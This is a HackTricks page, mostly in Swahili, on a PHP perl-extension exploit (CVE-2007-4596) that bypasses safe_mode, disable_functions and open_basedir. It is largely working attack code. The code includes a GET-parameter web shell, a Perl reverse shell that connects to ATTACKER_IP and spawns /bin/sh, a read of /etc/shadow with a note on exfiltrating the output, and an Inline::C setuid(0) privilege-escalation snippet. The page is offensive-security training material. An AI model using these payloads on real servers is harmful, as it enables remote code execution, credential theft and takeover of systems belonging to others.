PHP Perl Extension Safe_mode Bypass Exploit

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

Shida inayofuatiliwa kama CVE-2007-4596 inatokana na extension ya kimila ya perl kwa PHP, ambayo ina embed interpreter kamili ya Perl bila kuheshimu udhibiti wa PHP wa safe_mode, disable_functions, au open_basedir. Kila PHP worker inayopakia extension=perl.so inapata eval isiyozuilika ya Perl, hivyo utekelezaji wa amri unabaki rahisi hata pale primitive za kawaida za kuanzisha mchakato za PHP zikipigwa marufuku. Ingawa safe_mode ilifutwa katika PHP 5.4, stack nyingi za shared-hosting zilizotumika zamani na maabara zilizo hatarini bado zinaitoa, hivyo bypass hii bado ina thamani unapopata udhibiti kwenye control panels za zamani.

Kuunda Mazingira ya Kujaribu mwaka 2025

  • The last publicly shipped build (perl-1.0.1, January 2013) targets PHP ≥5.0. Fetch it from PECL, compile it for the exact PHP branch you plan to attack, and load it globally (php.ini) or via dl() (if permitted).
  • Mapishi ya haraka ya maabara kwa msingi wa Debian:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • During exploitation confirm availability with var_dump(extension_loaded('perl')); or print_r(get_loaded_extensions());. Ikiwa haipo, tafuta perl.so au tumia entries za php.ini/.user.ini zinazoweza kuandikwa ili kuiloade kwa nguvu.
  • Kwa sababu interpreter inaishi ndani ya PHP worker, hakuna binaries za nje zinazohitajika—network egress filters au proc_open blacklists hazina maana.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, bado inafaa kuthibitisha kwamba extension inajibu eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Maboresho ya Payload za Kisasa

1. TTY kamili kupitia TCP

Mfasiri uliyojumuishwa anaweza kupakia IO::Socket hata kama /usr/bin/perl imezuiwa:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. Kutoroka kwa Mfumo wa Faili Hata kwa open_basedir

Perl haizingatii open_basedir ya PHP, hivyo unaweza kusoma faili zozote:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Pita pato kupitia IO::Socket::INET au Net::HTTP ili exfiltrate data bila kugusa descriptors zinazosimamiwa na PHP.

3. Inline Compilation for Privilege Escalation

Ikiwa Inline::C inapatikana system-wide, compile helpers ndani ya ombi bila kutegemea PHP’s ffi au pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Tumia Perl kama seti ya zana za LOLBAS — kwa mfano, dump MySQL DSNs hata kama mysqli haipo:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Marejeleo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks